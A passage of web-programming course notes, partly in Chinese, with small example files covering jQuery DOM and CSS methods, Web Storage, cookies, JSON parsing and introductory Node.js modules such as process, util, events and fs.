<button id="btn21">创建一个新的div来环绕每个p元素</button>
<button id="btn22">去掉 div 元素</button>
$(document).ready(function(){
$("#btn18").click(function(){$("p:eq(3)").text($("input:text").val());});
$("#btn19").click(function(){
$("input:text").val(function (n,c) {
return c+" Chen";
});
});
$("#btn20").click(function(){
$("p").replaceWith(function(n){
return "<h3>这个元素的下标是 " + n + ".</h3>";
});
});
$("#btn21").click(function(){$("p").wrap(document.createElement("div"));});
$("#btn22").click(function(){$("p").unwrap();});
});
CSS Manipulation
The css() method sets or returns one or more style properties of the selected elements.
When used to return a property:
• The method returns the value of the specified CSS property of the first matched element. Note that shorthand CSS properties (such as background and border) are not fully supported, and returning their values can give different results in different browsers.
• Syntax: $(selector).css(property)
When used to set properties:
• The method sets the specified CSS property on all matched elements.
• Set a CSS property and value: $(selector).css(property,value)
• Set a CSS property and value using a function: $(selector).css(property,function(index,currentvalue))
• Set multiple properties and values: $(selector).css({property:value, property:value, ...})
Chap3-70.html
<body><p style="font-size: 30px;color: red">这是一个段落。</p>
<button id="btn1">返回P元素的CSS样式颜色值</button><button id="btn2">设置P元素的字体大小</button>
<button id="btn3">设置P元素的多个css属性</button>
<script>
$(document).ready(function(){
$("#btn1").click(function(){$("p").text($("p").css("color"));});
$("#btn2").click(function(){
$("p").css("font-size",function(i,v){
return Number(v.substr(0,v.length-2))+10;
});
});
$("#btn3").click(function(){
$("p").css({
"color":"white",
"background-color":"lightgray",
"font-family":"Arial",
"font-size":"50px",
"padding":"5px"
});
});
});
</script>
</body>
Client-Side Storage
Client-side storage lets web applications store data on the user's computer through APIs provided by the browser.
Client-side storage follows the same-origin policy, so pages from different sites cannot read each other's stored data, while different pages from the same site can share stored data with each other.
Web applications can choose the lifetime of the data they store: temporary storage keeps data until the current window is closed or the browser exits, while permanent storage keeps data on disk indefinitely, remaining valid for months or years.
Client-side storage takes the following forms:
• Web storage
Web storage started as an HTML5 API and later became a standard in its own right. It is now implemented by the mainstream browsers, including IE8. It consists of the localStorage and sessionStorage objects, which are in effect persistent associative arrays: maps from names to values, where both the names and the values are strings. Web storage is easy to use, supports large (though not unlimited) amounts of data, and is compatible with all current mainstream browsers.
• Cookies
Cookies are an early client-side storage mechanism, originally designed for use by server-side scripts. Although the client exposes a JavaScript API for manipulating cookies, it is extremely clumsy and suitable only for small amounts of text. Moreover, any data stored as cookies is transmitted to the server with every HTTP request, whether the server needs it or not. An important reason cookies are still widely used by client-side programmers is that every browser, old and new, supports them. As Web Storage spreads, however, cookies should return to their original role: a client-side storage mechanism used by server-side scripts.
Web Storage
Browsers that implement the "Web Storage" draft standard define two properties on the window object: localStorage and sessionStorage. Typing window.localStorage in the console shows the data stored by the page.
Each of these properties refers to a Storage object (a persistent associative array). The arrays are indexed by strings, and the stored values are also strings. Using a Storage object is no different from using an ordinary JavaScript object: set a property of the object to a string value, and the browser stores that value for you. localStorage and sessionStorage differ in lifetime and scope, that is, in how long the data is kept and who has access to it.
Data stored through localStorage is permanent: unless the web application deletes it, or the user deletes it through the browser's settings, the data stays on the user's computer and never expires.
The scope of localStorage is limited to the document origin, which is determined by the protocol, hostname, and port; URLs that differ in any of these belong to different document origins.
The lifetime of sessionStorage matches that of the top-level window or browser tab in which the storing script is running. Once the window or tab is permanently closed, all data stored through sessionStorage is deleted with it.
sessionStorage is also scoped to the document origin, so documents from different origins cannot share sessionStorage. Beyond that, sessionStorage is scoped per window: if the same-origin document is rendered in two different browser tabs, each tab has its own sessionStorage data and they cannot share it, even for two identical tabs in the same browser.
Chap3-71.html
<p>中文姓名:<input type="text" id="txtC"> </p><p>英文姓名:<input type="text" id="txtE"> </p>
<button id="btn1">Web存储-localStorage</button><button id="btn2">Web存储-sessionStorage</button>
$(document).ready(function(){
var nameC=localStorage.uNameC; // same as nameC=localStorage["uNameC"]
if(!nameC){
$("#txtC").val("请输入用户名");
}else{
$("#txtC").val(localStorage.uNameC);
}
var nameE=sessionStorage.uNameE;
if(!nameE){
$("#txtE").val("Please input your name");
}else{
$("#txtE").val(sessionStorage.uNameE);
}
$("#btn1").click(function(){
localStorage.uNameC=$("#txtC").val();
});
$("#btn2").click(function(){
sessionStorage.uNameE=$("#txtE").val();
});
});
localStorage and sessionStorage are normally used as ordinary JavaScript objects: store a string value by setting a property, and read the value back by querying that property. The two objects also provide the following properties and methods:
Property or method	Syntax	Description
length	storage.length	Returns the number of data items stored in the Storage object.
setItem()	storage.setItem(keyName, keyValue)	Takes a key name and a value as parameters; adds the key to the storage, or updates its value if the key already exists.
getItem()	storage.getItem(keyName)	Takes a key name as a parameter and returns the value for that key.
removeItem()	storage.removeItem(keyName)	Takes a key name as a parameter and removes that key from the storage.
clear()	storage.clear()	Empties all of the keys and values in the storage object.
key()	storage.key(n)	Takes a number n as a parameter and returns the key name of the nth data item in the storage object.
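The members listed above are easy to picture as a small in-memory class. The sketch below is a stand-in written for illustration; the real localStorage and sessionStorage are supplied by the browser and actually persist data.

```javascript
// An in-memory imitation of the Storage interface (illustrative only).
// Like the real thing, it coerces keys and values to strings and
// returns null for missing keys.
class MemoryStorage {
  constructor() { this._data = new Map(); }
  get length() { return this._data.size; }
  setItem(key, value) { this._data.set(String(key), String(value)); }
  getItem(key) {
    return this._data.has(String(key)) ? this._data.get(String(key)) : null;
  }
  removeItem(key) { this._data.delete(String(key)); }
  clear() { this._data.clear(); }
  key(n) { return [...this._data.keys()][n] ?? null; }
}

const store = new MemoryStorage();
store.setItem("bgcolor", "red");
store.setItem("font", "Helvetica");
store.removeItem("font");
```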
Chap3-71.html
<div id="results" style="font-size: x-large"></div>
$(document).ready(function(){
localStorage.setItem('bgcolor', 'red');
localStorage.setItem('font', 'Helvetica');
localStorage.setItem('image', 'myCat.png');
$("#results").html("删除前Storage中数据项:<br>");
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
localStorage.removeItem("image");
$("#results").html(function (n,v) {
return v+"删除后Storage中数据项:<br>";
});
for(var i=0;i<localStorage.length;i++){
$("#results").html(function (n,v) {
return v+localStorage.key(i)+": "+localStorage.getItem(localStorage.key(i))+"<br>";
});
}
});
Cookies
A cookie is a small amount of data stored by the web browser and associated with a particular web page or site. Cookies were originally designed for server-side use: cookie data is transmitted automatically between the web browser and the web server, so server-side scripts can read and write cookie values on the client.
Cookie values can be read through document.cookie. See section 3.2.1.3 for details.
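document.cookie returns all of a page's cookies as one "name=value; name=value" string, which is part of what makes the API clumsy. A small helper (written here for illustration; it is not a DOM API) can split that string into an object for easier lookup:

```javascript
// Parse a cookie string of the form "a=1; b=2" into an object.
// Values are URL-decoded, as cookie values commonly are.
function parseCookies(cookieString) {
  const result = {};
  for (const pair of cookieString.split("; ")) {
    if (!pair) continue; // skip the empty entry from an empty string
    const eq = pair.indexOf("=");
    const name = decodeURIComponent(pair.slice(0, eq));
    result[name] = decodeURIComponent(pair.slice(eq + 1));
  }
  return result;
}

// In a browser you would pass document.cookie here.
const cookies = parseCookies("theme=dark; lang=zh-CN");
```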
JSON
What is JSON?
JSON stands for JavaScript Object Notation.
JSON is a lightweight text format for data interchange.
JSON uses JavaScript syntax to describe data objects, but JSON remains independent of language and platform. JSON parsers and JSON libraries exist for many different programming languages.
JSON is self-describing and easy to understand.
JSON Files
The file extension for JSON files is .json
The MIME type for JSON text is application/json
JSON Syntax Rules
JSON syntax is a subset of the JavaScript object notation syntax:
• Data is in name/value pairs.
• Data is separated by commas.
• Curly braces hold objects.
• Square brackets hold arrays.
{
"employees": [
{ "firstName":"Bill" , "lastName":"Gates" },
{ "firstName":"George" , "lastName":"Bush" },
{ "firstName":"Thomas" , "lastName":"Carter" }
]
}
You can access the first item in the JavaScript object array like this: employees[0].lastName;
You can modify the data like this: employees[0].lastName = "Jobs";
A JSON value can be:
• a number (integer or floating point)
• a string (in double quotes)
• a Boolean (true or false)
• an array (in square brackets)
• an object (in curly braces)
• null
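The value types above can be seen round-tripping through JSON.stringify and JSON.parse. Note that undefined and functions are not valid JSON values; JSON.stringify simply drops such properties.

```javascript
// One property per JSON value type, serialized and parsed back.
const original = {
  count: 3,            // number
  name: "Bill",        // string
  active: true,        // Boolean
  tags: ["a", "b"],    // array
  child: { x: 1 },     // object
  missing: null        // null
};

const text = JSON.stringify(original);
const copy = JSON.parse(text);
```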
Chap3-72.html
<h2>在 JavaScript 中创建 JSON 对象</h2>
<p style="font-size: x-large">
Name: <span id="jname"></span><br />
Age: <span id="jage"></span><br />
Address: <span id="jstreet"></span><br />
Phone: <span id="jphone"></span><br />
</p>
<script type="text/javascript">
var JSONObject= {
"name":"Bill Gates",
"street":"Fifth Avenue New York 666",
"age":56,
"phone":"555 1234567"};
document.getElementById("jname").innerHTML=JSONObject.name;
document.getElementById("jage").innerHTML=JSONObject.age;
document.getElementById("jstreet").innerHTML=JSONObject.street;
document.getElementById("jphone").innerHTML=JSONObject.phone;
</script>
Using JSON
One of the most common uses of JSON is to read JSON data from a web server (as a file or as an HttpRequest), convert the JSON data into a JavaScript object, and then use that data in a web page.
The JavaScript eval() function can be used to convert JSON text into a JavaScript object. The text must be wrapped in parentheses to avoid a syntax error:
var obj = eval ("(" + txt + ")");
Note: eval() compiles and executes any JavaScript code, which hides a potential security problem.
Using a JSON parser to convert JSON into JavaScript objects is the safer approach. A JSON parser recognizes only JSON text and will not compile scripts.
Converting Between JSON Objects and JSON Strings
• JSON.parse(jsonString): parses a JSON object out of a string
• jQuery.parseJSON(jsonString): converts a well-formed JSON string into the corresponding JavaScript object
• JSON.stringify(obj): converts a JSON object into a string
The difference between JSON.parse() and jQuery.parseJSON(): some browsers do not support JSON.parse(). When you call jQuery.parseJSON(), it returns the result of JSON.parse() where the browser supports it, and otherwise returns a result similar to running eval().
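The safety difference is easy to demonstrate: eval will happily execute anything handed to it, while JSON.parse throws on input that is not JSON text.

```javascript
// Both approaches produce the same object for well-formed JSON text.
const txt = '{"firstName":"Bill","lastName":"Gates"}';

const viaParse = JSON.parse(txt);
// eval needs the wrapping parentheses so the braces are read as an
// object literal rather than a block statement.
const viaEval = eval("(" + txt + ")");

// For non-JSON input, JSON.parse rejects it instead of executing it.
let rejected = false;
try {
  JSON.parse("console.log('pwned')");
} catch (e) {
  rejected = true; // SyntaxError: this is not JSON
}
```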
Chap3-73.html
<h2>通过 JSON 字符串来创建对象</h2>
<p style="font-size: x-large">
First Name: <span id="fname1"></span><br />
Last Name: <span id="lname1"></span><br />
First Name: <span id="fname2"></span><br />
Last Name: <span id="lname2"></span><br />
</p>
<script type="text/javascript">
var txt = '{"employees":[' +
'{"firstName":"Bill","lastName":"Gates" },' +
'{"firstName":"George","lastName":"Bush" },' +
'{"firstName":"Thomas","lastName":"Carter" }]}';
var obj = eval ("(" + txt + ")");
document.getElementById("fname1").innerHTML=obj.employees[1].firstName;
document.getElementById("lname1").innerHTML=obj.employees[1].lastName;
var obj1 = JSON.parse(txt);
document.getElementById("fname2").innerHTML=obj1.employees[2].firstName;
document.getElementById("lname2").innerHTML=obj1.employees[2].lastName;
</script>
Node
• Node overview
• Node core modules
• The Express framework
Node Overview
Node, or Node.js, is a platform that lets JavaScript run on the server. With Node.js you can easily build server-side applications, standing on an equal footing with PHP, Python, Perl, and Ruby on the server side.
With Node.js you can easily develop:
• websites with complex logic;
• large-scale social-network web applications;
• WebSocket servers;
• TCP/UDP socket applications;
• command-line tools;
• interactive terminal programs;
• native applications with a graphical user interface;
• unit-testing tools;
• client-side JavaScript compilers.
When you use Node.js you do not need to set up a separate HTTP server, because Node.js has one built in. This server is not just for debugging code: it can be deployed straight to production, and its performance is good enough for that.
Node.js's defining characteristic is its architecture built on asynchronous I/O and an event-driven design. While running, Node.js maintains an event queue; the program enters an event loop and waits for the next event to arrive, and as each asynchronous I/O request completes, it is pushed onto the event queue to wait for the process to handle it.
For example, a simple, common database query is traditionally written like this:
res = db.query('SELECT * from some_table');
res.output();
When this code reaches the first line, the thread blocks, waiting for the database to return the query result before it can continue.
Under high concurrency, threads sit blocked for long periods on one hand, while on the other hand new threads keep being created to handle new requests. This wastes large amounts of system resources, the growing number of threads consumes a great deal of CPU time on memory context switches, and the system becomes vulnerable to slow-connection attacks.
Here is how Node.js solves the problem:
db.query('SELECT * from some_table', function(res) {
res.output();
});
// subsequent statements
In this code, the second argument to db.query is a function, called a callback. When execution reaches db.query, the process does not wait for the result; it continues straight on to the following statements until it enters the event loop. When the database query result comes back, an event is pushed onto the event queue, and only when the thread re-enters the event loop is the earlier callback invoked to continue the remaining logic.
Node.js's asynchronous mechanism is event-based: all disk I/O, network communication, and database queries are requested in a non-blocking way, and the returned results are handled by the event loop.
A Node.js process handles only one event at a time, and as soon as it finishes, it re-enters the event loop to check for and handle the next event. The benefit is that CPU and memory are focused on one task at a time, while the slow I/O operations run in parallel as much as possible. Against slow-connection attacks, Node.js merely adds requests to the event queue and waits for the operating system's response, so there is no multithreading overhead; this greatly improves the robustness of web applications and guards against malicious attacks.
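The callback-style API shape from the db.query example can be sketched without a real database. Note the deliberate simplification: this stand-in invokes the callback synchronously so the result can be inspected immediately, whereas a real driver would deliver it later through the event loop, so "subsequent statements" would actually run before the callback.

```javascript
// A synchronous stand-in for db.query (no real database; illustration only).
const log = [];

function query(sql, callback) {
  // Pretend this result object came back from the database.
  callback({
    output: function () { log.push("result of " + sql); }
  });
}

query("SELECT * from some_table", function (res) {
  res.output(); // runs when the result is delivered
});
log.push("statements after the query");
```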
Node Events
Chap4-1-1.js (asynchronous file read)
var fs=require('fs'); // built-in filesystem module fs
console.log("异步读取文件");
fs.readFile('files/content.txt','utf-8',function (err,data) {
if(err){
console.error(err);
}else {
console.log(data);
}
});
console.log('end.');
Chap4-1-2.js (synchronous file read)
var fs=require('fs'); // built-in filesystem module fs
console.log("同步读取文件");
var data=fs.readFileSync('chap3.js','utf-8');
console.log(data);
console.log("end");
Installation
Download Node 8.11.1 LTS from https://nodejs.org/en/ and follow the installation steps.
To test whether the installation succeeded, type cmd in the Run dialog to open a command prompt, then type node; this enters Node.js's interactive mode.
Installing Node
Node.js installed this way also comes with npm, which you can use directly from the command prompt.
The Node package manager (npm) is the package-management tool provided with Node.js. It runs on Node.js and solves many of the problems of deploying Node.js code. Common usage scenarios include:
• downloading third-party packages written by others from the npm registry for local use;
• downloading and installing command-line programs written by others from the npm registry for local use;
• uploading your own packages or command-line programs to the npm registry for others to use.
You can test whether npm installed successfully by typing npm -v.
npm
Building an HTTP Server
Node.js is a platform born for the network. Unlike the "browser - HTTP server - PHP interpreter" arrangement, Node.js strips out the separate "HTTP server" layer and faces the browser user directly.
Node vs. PHP architecture
Chap4-2.js
var http=require('http'); // the http module can create server instances and can also send HTTP requests
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
Modules and Packages
Modules and packages are the most important pillars of Node.js. A program of any real size cannot live in a single file; the usual approach is to split functionality apart, encapsulate the pieces, and then compose them, and modules exist precisely to support this way of working.
Node.js provides the require function for loading other modules, and modules are file-based, so the mechanism is very simple.
Modules and packages are often mentioned in the same breath in Node.js, because there is no essential difference between them and the two terms are frequently mixed. If you want to distinguish them, think of a package as a collection of modules implementing some piece of functionality, bundled for publication and maintenance.
Creating a Module
Creating a module in Node.js is very simple, because a file is a module; the only question to care about is how other files obtain access to it.
Node.js provides two objects, exports and require: exports is the module's public interface, and require obtains a module's interface from outside, i.e. the exports object of the loaded module.
module.js
The exports object exposes setName and sayHello as the module's interface.
var name;
exports.setName=function (theName) {
name=theName;
};
exports.sayHello=function () {
return "hello "+name;
};
Chap4-3.js
chap4-3.js loads this module with require('./module'), after which the member functions of module.js's exports object can be called directly.
var http=require('http'); //the http module can create server instances and also send HTTP requests
var mymodule=require("./module");
mymodule.setName("Zhang San");
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>"+mymodule.sayHello()+"</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
The tens of thousands of modules on npm are all built up in this simple way.
Creating a package
A package is a deeper abstraction built on modules: it encapsulates an independent piece of functionality for publication, updates, dependency management, and version control. Node.js implements its package mechanism following the CommonJS specification, and npm was developed to handle publishing and retrieving packages.
A Node.js package is a directory containing a package description file in JSON format, package.json. A package strictly conforming to the CommonJS specification has the following characteristics:
• package.json must sit in the package's top-level directory;
• binary files should be under bin;
• JavaScript code should be under lib;
• documentation should be under doc;
• unit tests should be under test.
Node.js itself is not that strict: a package merely needs a package.json in its top-level directory that follows a few conventions.
A folder as a module
Modules correspond one-to-one with files, but a "file" can be JavaScript code, binary code, or a folder. The simplest package is just a folder acting as a module.
For example, create a folder called somepackage and, inside it, index.js:
exports.hello=function () {console.log("hello.");};
Then, outside somepackage, create Chap4-4.js:
Chap4-4.js
var somePackage=require("./somepackage");
somePackage.hello();
This technique wraps a folder up as a module — which is exactly what a package is. A package is usually a collection of modules, providing a higher level of abstraction on top of them, much like a function library with a fixed interface.
package.json
By customizing package.json we can build more complex, complete, spec-compliant packages for publication. In the somepackage folder from the previous example, create a file named package.json with the following content:
{"main":"./lib/interface.js"}
Then rename index.js to interface.js and move it into a lib subfolder. Requiring the package exactly as before still works.
When Node.js loads a package, it first checks the main field of the package's package.json and treats it as the package's interface module; if package.json or its main field is missing, it falls back to index.js or index.node as the interface.
package.json is the file CommonJS specifies for describing a package. A fully spec-compliant package.json contains the following fields:
• name: the package name. It must be unique, made up of lowercase letters, digits, and underscores, with no spaces.
• description: a brief description of the package.
• version: a version string conforming to the semantic versioning specification.
• keywords: an array of keywords, usually used for searching.
• maintainers: an array of maintainers; each element has name, email (optional), and web (optional) fields.
• contributors: an array of contributors, in the same format as maintainers. The package's author should be the first element of the array.
• bugs: where to report bugs; a URL or an email address.
• licenses: an array of licenses; each element has type (the license's name) and url (a link to the license text) fields.
• main: the entry file; if this field is absent, lookup falls back, in order, to index.js, index.node, index.json.
• dependencies: the packages this one depends on — an associative array of package names and version numbers.
• repositories: where the source code is hosted; each element has type (repository type, e.g. git), url (repository address), and path (path within the repository, optional) fields.
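The fields above can be combined into a minimal package.json. The names and values in this sketch are made up for illustration, reusing the somepackage example:

```json
{
  "name": "somepackage",
  "description": "A sample package exposing one greeting function",
  "version": "1.0.0",
  "keywords": ["sample", "greeting"],
  "maintainers": [{ "name": "Zhang San" }],
  "main": "./lib/interface.js",
  "dependencies": {}
}
```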
The Node.js package manager
npm is the package management tool provided officially with Node.js. It has become the standard publishing platform for Node.js packages, used for their publication, distribution, and dependency control. npm provides a command-line tool that makes it easy to download, install, upgrade, and remove packages, and lets you publish and maintain packages as a developer.
Getting a package
The command for installing a package with npm is: npm [install/i] [package_name]
By default npm searches for and downloads packages from http://npmjs.org, installing them into the node_modules subdirectory of the current directory.
Local mode and global mode
npm installs packages in one of two modes: local and global. By default the npm install command uses local mode, placing the package in the node_modules subdirectory of the current directory. Since Node.js's require searches node_modules subdirectories when loading modules, packages installed in npm's local mode can be required directly.
npm's other installation mode is called global mode, used as: npm [install/i] -g [package_name]
In global mode, npm installs the package into a system directory, e.g. C:\Users\admin\node_modules.
Note: packages installed in global mode cannot be loaded directly with require in a JavaScript file, because require does not search C:\Users\admin\node_modules.
In short: when a package is part of your project at runtime, install it in local mode; when you want to use it from the command line, install it in global mode.
Node core modules
• Global objects
• Common utilities
• Event mechanism
• File system access
• url & querystring modules
• HTTP server and client
Global objects
The global object in Node.js is global, and all global variables (except global itself) are properties of the global object, e.g. console, exports, and process.
The process object
process is a global variable that provides information about, and control over, the current Node.js process. Being global, it can be used without require().
• process.argv returns an array containing the command-line arguments the Node.js process was launched with. The first element is node, the second is the path of the JavaScript file being executed, and the remaining elements are the other command-line arguments.
Chap4-5.js
process.argv.forEach(function(val,index){
console.log(index+":"+val);
});
Run the following command to start the process:
node chap4-5.js one two=three four
• process.stdout is the standard output stream. console.log() is the usual way to print characters to standard output; process.stdout.write() offers a lower-level interface.
• process.stdin is the standard input stream.
Chap4-5.js
var num1, num2;
process.stdout.write('Enter num1: ');//print a prompt asking for num1
/* listen for the user's input */
process.stdin.on('data', function (chunk) {
if (!num1) {
num1 = Number(chunk);
process.stdout.write('Enter num2: ');//print a prompt asking for num2
} else {
num2 = Number(chunk);
process.stdout.write('Result: ' + (num1 + num2));
}
});
The console object
Used to print characters to the standard output stream (stdout) or standard error stream (stderr).
• console.log(): prints characters to standard output, ending with a newline; it accepts any number of arguments.
const count = 5;
console.log('count: %d', count);
• console.error(): same usage as console.log(), but prints to the standard error stream.
console.error('error #%d', count);
The __dirname property
Returns the directory name of the current module — the same value as path.dirname(__filename).
console.log(__dirname); //prints D:\教学\讲义\网络技术与应用\programming\myNode\chap4
The __filename property
Returns the file name of the current module.
console.log(__filename); //prints D:\教学\讲义\网络技术与应用\programming\myNode\chap4\chap4-6.js
The require() method
Loading modules:
• Loading a package from the same directory (by folder name)
Note: the package name must be prefixed with ./
Chap4-3.js
var http=require('http'); //the http module can create server instances and also send HTTP requests
var mymodule=require("./module");
mymodule.setName("Zhang San");
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>"+mymodule.sayHello()+"</p>");
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
• Loading a package from the node_modules directory under the same directory
Package path: \myNode\node_modules\somepackage\index.js
Path of Chap4-7.js: \myNode\chap4-7.js
Chap4-7.js
var somePackage=require("somepackage");
somePackage.hello();
Common utilities: util
The util module is a collection of commonly used functions, making up for core JavaScript's deliberately minimal feature set. Load it with: var util = require('util');
util.inherits(constructor, superConstructor)
Inherits the prototype methods from one constructor into another. The prototype of constructor is set to a new object created from superConstructor.
Chap4-8.js
var util=require("util");
function Base() {
this.name="base";
this.base=1991;
this.sayHello=function () {
console.log("hello "+this.name);
};
}
Base.prototype.showName=function () {
console.log(this.name);
};
function Sub() {
this.name="sub";
}
util.inherits(Sub,Base);
var objBase=new Base();
objBase.showName();
objBase.sayHello();
console.log(objBase);
var objSub=new Sub();
objSub.showName();
console.log(objSub);
Output:
base
hello base
Base { name: 'base', base: 1991, sayHello: [Function] }
sub
Sub { name: 'sub' }
util.inspect(object[, options])
Returns a string representation of object, mainly useful for debugging.
options can change certain aspects of the formatted string:
• showHidden: if true, the object's non-enumerable symbols and properties are included in the formatted result. Defaults to false.
• depth: the maximum recursion depth. For a complex object, specify it to control how much is printed. The default is to recurse 2 levels; null means unlimited recursion, traversing the object completely.
• colors: if true, the output is styled with ANSI color codes, typically for prettier display in a terminal.
Chap4-9.js
var util=require("util");
function Person() {
this.name="byvoid";
this.toString=function () {
return this.name;
};
}
var obj=new Person();
console.log(util.inspect(obj));
console.log(util.inspect(obj,true));
Output:
Person { name: 'byvoid', toString: [Function] }
Person {
name: 'byvoid',
toString:
{ [Function]
[length]: 0,
[name]: '',
[arguments]: null,
[caller]: null,
[prototype]: { [constructor]: [Circular] } } }
Event mechanism
events is the most important module in Node.js — no "one of" about it — because Node.js's own architecture is event-driven and this module provides its only interface, making it the cornerstone of event programming in Node.js. It is used not only for user code to interact with the event loop beneath Node.js, but is also depended upon by nearly all other modules.
The events module provides just one object: events.EventEmitter. The core of EventEmitter is its encapsulation of event emission and event listening.
Each EventEmitter event consists of an event name and any number of arguments; the name is a string, usually carrying some semantics. For each event, EventEmitter supports multiple listeners. When an event is emitted, the listeners registered for it are invoked in turn, with the event arguments passed as callback parameters.
Chap4-10.js
var events=require("events");
var emitter=new events.EventEmitter();
emitter.on("someEvent",function (arg1,arg2) {
console.log("Listener1",arg1,arg2);
});
emitter.on("someEvent",function (arg1,arg2) {
console.log("Listener2",arg1,arg2);
});
emitter.emit("someEvent","byvoid",1991);
Output:
Listener1 byvoid 1991
Listener2 byvoid 1991
EventEmitter object method Description
addListener(event, listener) Adds a listener for the given event to the end of the listener array
on(event, listener) Registers a listener for the given event; takes a string event and a callback function
once(event, listener) Registers a one-shot listener for the given event: it fires at most once and is removed immediately after firing
removeListener(event, listener) Removes one listener for the given event; it must be a listener already registered for that event. Takes two arguments: the event name and the callback function
removeAllListeners([event]) Removes all listeners for all events; if an event is given, removes all listeners for that event
setMaxListeners(n) By default, an EventEmitter prints a warning once more than 10 listeners are added; setMaxListeners raises that default limit
listeners(event) Returns the array of listeners for the given event
emit(event, [arg1], [arg2], [...]) Invokes each listener in order with the given arguments; returns true if the event had registered listeners, false otherwise
EventEmitter class method Description
listenerCount(emitter, event) Returns the number of listeners for the given event.
Chap4-10.js
var events = require('events');
var eventEmitter = new events.EventEmitter();
var listener1 = function listener1() {console.log('listener1 fired.');} // listener #1
var listener2 = function listener2() {console.log('listener2 fired.');} // listener #2
var listener3 = function listener3() {console.log('listener3 fired.');} // listener #3
// bind the connection event to handler listener1
eventEmitter.addListener('connection', listener1 );
// bind the connection event to handler listener2
eventEmitter.on('connection', listener2 );
// bind the connection event to one-shot handler listener3
eventEmitter.once('connection', listener3 );
var eventListeners = require('events').EventEmitter.listenerCount(eventEmitter,'connection');
console.log(eventListeners + " listener(s) listening for the connection event.");
// fire the connection event
eventEmitter.emit('connection');
// remove the bound listener1 function
eventEmitter.removeListener('connection', listener1 );
console.log("listener1 is no longer listening.");
// fire the connection event again
eventEmitter.emit('connection');
eventListeners = require('events').EventEmitter.listenerCount(eventEmitter,'connection');
console.log(eventListeners + " listener(s) listening for the connection event.");
console.log("Program finished.");
File system access
The fs module wraps file operations, offering reading, writing, renaming, deleting, directory traversal, linking, and other file system operations.
Node imports the file system module (fs) like this: var fs = require("fs")
fs.readFile(filename[, encoding][, callback(err,data)])
filename is the name of the file to read;
encoding is optional and gives the file's character encoding;
callback is the callback that receives the file's contents. It takes two parameters, err and data: err tells whether an error occurred, and data holds the file content. If encoding was specified, data is a decoded string; otherwise data is the binary data as a Buffer.
Chap4-11.js
var fs=require('fs'); //built-in file system module fs
fs.readFile('files/content.txt','utf-8',function (err,data) {
if(err){
console.error(err);
}else {
console.log("utf-8");
console.log(data);
}
});
fs.readFile('files/content.txt',function (err,data) {
if(err){
console.error(err);
}else {
console.log("default encoding");
console.log(data);
}
});
Output:
utf-8
Text 文本文件实例
default encoding
<Buffer 54 65 78 74 20 e6 96 87 e6 9c ac e6 96 87 e4 bb b6 e5 ae 9e e4 be 8b>
fs.readFileSync(filename, [encoding])
The synchronous version of fs.readFile.
It takes the same parameters as fs.readFile, and the file's content is returned as the function's return value. If an error occurs, fs throws an exception, which you must catch and handle with try/catch.
Chap4-1-2.js
var fs=require('fs'); //built-in file system module fs
console.log("Synchronous file read");
var data=fs.readFileSync('chap3.js','utf-8');
console.log(data);
console.log("end");
fs.open(path, flags, [mode], [callback(err, fd)])
Opens a file asynchronously.
path is the path of the file;
flags can be one of:
• r: open the file for reading.
• r+: open the file for reading and writing.
• w: open the file for writing; the file is created if it does not exist.
• w+: open the file for reading and writing; the file is created if it does not exist.
• a: open the file for appending; the file is created if it does not exist.
• a+: open the file for reading and appending; the file is created if it does not exist.
mode assigns permissions when the file is created, and only takes effect at creation time. The default is 0666, readable and writable.
fd is an integer: the file descriptor returned by opening the file.
fs.read(fd, buffer, offset, length, position, [callback(err, bytesRead, buffer)])
Reads data from the file descriptor fd and writes it into the buffer object buffer.
offset is the write offset within buffer;
length is the number of bytes to read from the file;
position is the position in the file to start reading from; if position is null, reading starts from the current file pointer;
the callback receives bytesRead and buffer: the number of bytes read and the buffer object.
fs.close(fd, [callback(err)])
Closes a file in asynchronous mode.
Chap4-12.js
Generally speaking, avoid reading files this way unless you must: it makes you manage the buffer and file pointer by hand, which becomes quite a chore, especially when you do not know the file's size.
var fs=require("fs");
fs.open("files/content.txt","r",function (err,fd) {
if(err){
console.error(err);
return;
}
var buf=new Buffer(8);
fs.read(fd,buf,0,8,null,function (err,bytesRead,buffer) {
if(err){
console.error(err);
return;
}
console.log("bytesRead:"+bytesRead);
console.log(buffer);
})
fs.close(fd,function (err) {
if(err){
return console.error(err);
}
});
});
Output:
bytesRead:8
<Buffer 54 65 78 74 20 e6 96 87>
fs.writeFile(file, data[, encoding][, callback(err)])
Asynchronously writes data to a file, replacing the file if it already exists;
file is a file name or file descriptor;
data can be a string or a buffer.
Chap4-13.js
var fs=require("fs");
console.log("About to write the file");
fs.writeFile("files/input.txt","Content written through fs.writeFile","utf8",function (err) {
if(err){
return console.error(err);
}
console.log("Data written successfully!");
})
fs.write(fd,buffer,offset,length,position,[callback(err, bytesWritten, buffer)])
Writes buffer to the file specified by fd;
offset is the offset within buffer to write from;
length is the number of bytes to write;
position is the position in the file to start writing at; if position is null, writing starts from the current file pointer;
the callback receives bytesWritten and buffer: the number of bytes written and the buffer object.
Node.js defines a Buffer class for creating buffers dedicated to holding binary data.
Chap4-14.js
var fs=require("fs");
fs.open("files/index2.txt","w",function (err,fd) {
if(err){
return console.error(err);
}
var buffer=new Buffer("Hello World!");
fs.write(fd,buffer,0,12,null,function (err,bytesWritten,buffer) {
if(err){
return console.error(err);
}
console.log(bytesWritten,buffer.slice(0,bytesWritten).toString());
fs.close(fd);
})
});
url & querystring modules
The url module
The url module provides utility functions for URL handling and parsing. A url string is a structured string with several meaningful components; parsing it returns a URL object with a property for each component.
The url module has three methods:
url.parse(urlStr[, parseQueryString][, slashesDenoteHost])
Converts a url string into an object.
urlStr: the url string to process;
parseQueryString: whether to also parse the query parameters into an object. When true, the querystring module is used to parse the query string; defaults to false.
slashesDenoteHost: how to treat a leading double slash, i.e. whether // denotes a host.
• Defaults to false: a string of the form //foo/bar is interpreted as { pathname: '//foo/bar' }.
